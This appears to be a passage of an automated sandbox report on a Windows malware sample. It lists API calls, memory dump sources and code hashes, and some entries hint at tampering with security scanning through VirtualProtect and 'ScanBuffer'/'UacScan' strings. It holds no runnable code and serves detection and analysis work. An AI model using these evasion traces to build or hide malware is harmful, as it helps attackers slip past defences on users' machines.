• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: fc48f3a8b0969c077f920d0ba9de5e60e1b97996e8baef57ad8a6f173c24141f
• Instruction ID: 5a6db37687052894080042e79aacdc5a30e62d2f7a7ac1bea3ec7179479ff023
• Opcode Fuzzy Hash: fc48f3a8b0969c077f920d0ba9de5e60e1b97996e8baef57ad8a6f173c24141f
• Instruction Fuzzy Hash: C911D770640204ABEB50FB69DC81D5D7BEDEB18310F904475B519E7350DB34ED418E74
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02E45798), ref: 02DFD35C
• RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD394
• RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD39F
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: d82ff11e4911831cecf5b5999332b80ff99969f3e7fa884f086aa64b05a7f84f
• Instruction ID: 87628e5a3bb454ffbea485313433e442077c20a44d5ee10e15df21af98786f73
• Opcode Fuzzy Hash: d82ff11e4911831cecf5b5999332b80ff99969f3e7fa884f086aa64b05a7f84f
• Instruction Fuzzy Hash: AC11D470640208ABEB50FBA9DC81E9E7BEDEB28310F904465A51AE7350DB34EE418E74
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
• GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
  • Part of subcall function 02DF7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B61
  • Part of subcall function 02DF7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02DF7B67
  • Part of subcall function 02DF7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B81
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
• String ID:
• API String ID: 2543409266-0
• Opcode ID: 7819277d09ff971fcfaebcb5e888be240c1593ca0c0876a4fe156e7366d56dd0
• Instruction ID: d61fc6cddd560006188a95bdf2c086bc1723358791c6c5a74337b571c4240d1b
• Opcode Fuzzy Hash: 7819277d09ff971fcfaebcb5e888be240c1593ca0c0876a4fe156e7366d56dd0
• Instruction Fuzzy Hash: 7F010470A80248AFFF40FF65DC52A5EB7A9EB54304FD05464A60AA3340DA749C00CB78
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: d8850f08b6b46cf38412211c2ad8b0b80bdfe7ce4b991c3c50dc78e1eab28146
• Instruction ID: 6449f7e9c1fe25310dca8b2ac0e64da33f7f3603c50e16c61e0d9adc33d4fb1f
• Opcode Fuzzy Hash: d8850f08b6b46cf38412211c2ad8b0b80bdfe7ce4b991c3c50dc78e1eab28146
• Instruction Fuzzy Hash: 15F0C264714110CACF217B34C884AAE2F9AEF40332F501462A8CF5B395DB36CC05C772
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 156935CA
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 156935E7
• RegCloseKey.ADVAPI32(?), ref: 156935F2
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 743beb9fcfa4f5b33f486b773bdba2342a86bdf329dee12886ca3960a8052daa
• Instruction ID: 2774851d87c77d586a0b386fb4d9ce8469e76ba0fc08e996a25c068406dd6970
• Opcode Fuzzy Hash: 743beb9fcfa4f5b33f486b773bdba2342a86bdf329dee12886ca3960a8052daa
• Instruction Fuzzy Hash: 82016D7AA01128BBCB209A95DD49DDE7FBEEB84260F004169FE45E2200DB319E55DBE0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 15693569
• RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 15693587
• RegCloseKey.ADVAPI32(00000000), ref: 15693592
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 88d08bb60cb151af42c8b24495c22e452a06f884700b1f1d67d34a7bc86233df
• Instruction ID: 09909245470450c987541cb56cd2bf5da7a1f312970ee68e32252ddda2d4ba43
• Opcode Fuzzy Hash: 88d08bb60cb151af42c8b24495c22e452a06f884700b1f1d67d34a7bc86233df
• Instruction Fuzzy Hash: 63F0F97690021CBFDF109EA0DD45FEA7BBDEB08721F104099FE04E6140E6315A54EBD0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4D1F
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02DE4D31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                    • Opcode ID: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                    • Instruction ID: 3f360c44af4a5154c59d5053e461980a36f2ded1737cf0553c9879e9937726de
                                                                                                                                                    • Opcode Fuzzy Hash: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                    • Instruction Fuzzy Hash: 10E0ECB82052059EEE153F218C41A3E326AEF81745F988499A806CE350DB74CC41AE38
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02DF7396
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString
                                                                                                                                                    • String ID: H
                                                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                                                    • Opcode ID: 79a4d74a5d07d12307159c483fa99c9b78141ee3fadb39b30da3d8ea4aa83f2d
                                                                                                                                                    • Instruction ID: 2ac81e474443efcc013be61e106c5a8af7d0f596a5eaa890250aa7c8deae43be
                                                                                                                                                    • Opcode Fuzzy Hash: 79a4d74a5d07d12307159c483fa99c9b78141ee3fadb39b30da3d8ea4aa83f2d
                                                                                                                                                    • Instruction Fuzzy Hash: 4DB1E074A01209AFEB50CF98D880A9DFBF2FF89314F258569E959AB320D730AC45CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02DEE73D
                                                                                                                                                      • Part of subcall function 02DEE320: VariantClear.OLEAUT32(?), ref: 02DEE32F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                    • Opcode ID: 1a5c6b004e10b3daca582ae5b09f2b9a929043f5715ad96fc833677beffb9e71
                                                                                                                                                    • Instruction ID: 35d558b1a380e6853a2f49038cc6a8f01ff3d264d448d8eed2bbc5afdcc4b735
                                                                                                                                                    • Opcode Fuzzy Hash: 1a5c6b004e10b3daca582ae5b09f2b9a929043f5715ad96fc833677beffb9e71
                                                                                                                                                    • Instruction Fuzzy Hash: 0711E52470065097DF20BF29C8C5A6B27EFEF88730B144466EA8B8B345DB31DC40CAB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                                    • Opcode ID: a40804c82ee5a6153a0c29b65b5bbd4cc51131cfd2f4eb0e1694f6e292f2bb7b
                                                                                                                                                    • Instruction ID: bd178ee7bad3a4bed3e76fcce2c5d4d20b6ce69ae51d9966fcdd0eaa980d9b16
                                                                                                                                                    • Opcode Fuzzy Hash: a40804c82ee5a6153a0c29b65b5bbd4cc51131cfd2f4eb0e1694f6e292f2bb7b
                                                                                                                                                    • Instruction Fuzzy Hash: A2312C75A04208AFEF11EEA8C884AAE77E8EF0C224F444562F90AD6350D775ED54CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02DF6D75,?,?,?,00000000), ref: 02DF6D55
                                                                                                                                                      • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeFromProgString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4225568880-0
                                                                                                                                                    • Opcode ID: 943d77bb4e57999696732dda55cb2c0c75fcab70462f1d758536092de1c07bd9
                                                                                                                                                    • Instruction ID: d13c58292a5ed9c177332f5c77eb6ea06ba5a9b8a626b97a5ded67904c2abad8
                                                                                                                                                    • Opcode Fuzzy Hash: 943d77bb4e57999696732dda55cb2c0c75fcab70462f1d758536092de1c07bd9
                                                                                                                                                    • Instruction Fuzzy Hash: 1FE06532604608BFEB11FA72EC5195D77FDDB49710F620471A90193700D9759E0499B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DE584A
                                                                                                                                                      • Part of subcall function 02DE5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AAC
                                                                                                                                                      • Part of subcall function 02DE5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5ACA
                                                                                                                                                      • Part of subcall function 02DE5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AE8
                                                                                                                                                      • Part of subcall function 02DE5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DE5B06
                                                                                                                                                      • Part of subcall function 02DE5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DE5B4F
                                                                                                                                                      • Part of subcall function 02DE5A90: RegQueryValueExA.ADVAPI32(?,02DE5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001), ref: 02DE5B6D
                                                                                                                                                      • Part of subcall function 02DE5A90: RegCloseKey.ADVAPI32(?,02DE5B9C,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DE5B8F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                    • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                    • Instruction ID: a6193f51a57de178c6be1700ee829cea5adda96c655cb987f9ded7b4e3ba0d7c
                                                                                                                                                    • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                    • Instruction Fuzzy Hash: 74E0ED71A002149BCF54EE5898C0A5637D8AB08798F844961EDAADF346D3B1DD548BE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02DE7DB0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                    • Instruction ID: 6734ff965e2b0eb3f7cdbe0172d08ace4bfa1bc3417a91e0aba9466fef84c05a
                                                                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                    • Instruction Fuzzy Hash: E4D05BB23091507AE620A95A6C44EBB5BDCCBC9771F10067DB568C3280D720CC01C6B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
                                                                                                                                                    • Instruction ID: 9276b8505a456c0606e35c366208edc2e82d3e0db00f50c2caf3f8f0bf79699e
                                                                                                                                                    • Opcode Fuzzy Hash: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
                                                                                                                                                    • Instruction Fuzzy Hash: FFC08CA1212301166E9071FC0CC401A4288895413C7640BBDF02BE63D1D321CC12A8B0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02E01133,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,ScanString), ref: 02DE7E47
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
                                                                                                                                                    • Instruction ID: 87789a2fa57795a2a6bfc338537eec00bef489df66e35315e25afa6e02b5c714
                                                                                                                                                    • Opcode Fuzzy Hash: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
                                                                                                                                                    • Instruction Fuzzy Hash: CCC08CA06123060E6E9072FC1CC02A9528A8964938B601BA9E02EE63C1D311DC226830
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    • SysReAllocStringLen.OLEAUT32(02E09E50,02DFD42C,00000016), ref: 02DE4C7A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                    • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                                                    • Instruction ID: bed1ebe48d8e07de5411e5752d30edd22e4ba91594d417395c55fab0909452fc
                                                                                                                                                    • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                                                    • Instruction Fuzzy Hash: 31D012641005019A9E3C75164D0593661AED9D030A74CCA5998034B340E7A1DC40CA39
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                    • Opcode ID: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                                                                                    • Instruction ID: 9c92ea0949850e950cfc4f7ad6c3fa404b2561d4506dfbbf28b7caacef5f8b16
                                                                                                                                                    • Opcode Fuzzy Hash: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                                                                                    • Instruction Fuzzy Hash: 76C012A160022047EF21AA599CC075962CCDB05295F1440A1D51ADB340E764DC00C674
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • timeSetEvent.WINMM(00002710,00000000,02E09B30,00000000,00000001), ref: 02E09B4C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Eventtime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2982266575-0
                                                                                                                                                    • Opcode ID: 6d00877cd281de36e0927669bd922da2fcebb6d0bc994ef994e904bca4c8bc65
                                                                                                                                                    • Instruction ID: 4daa4b4f9c44151adb2f2f70ed6016265cedd290ce39b1830317ae70467439e2
                                                                                                                                                    • Opcode Fuzzy Hash: 6d00877cd281de36e0927669bd922da2fcebb6d0bc994ef994e904bca4c8bc65
                                                                                                                                                    • Instruction Fuzzy Hash: 6CC09BF17E13007FF51069A51CD2F77158DD714B10F9054117601DD2C2D5E65C514674
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DE4C03
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2525500382-0
                                                                                                                                                    • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                                                    • Instruction ID: 99aa12515b2689983c7f5d599b86235c262597706b428c579b60b141688c9e28
                                                                                                                                                    • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                                                    • Instruction Fuzzy Hash: E9B0123830820118FE2431230E0173A004C4F90389F8800519F5BCC3C0FB41CC01C83B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02DE4C1B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
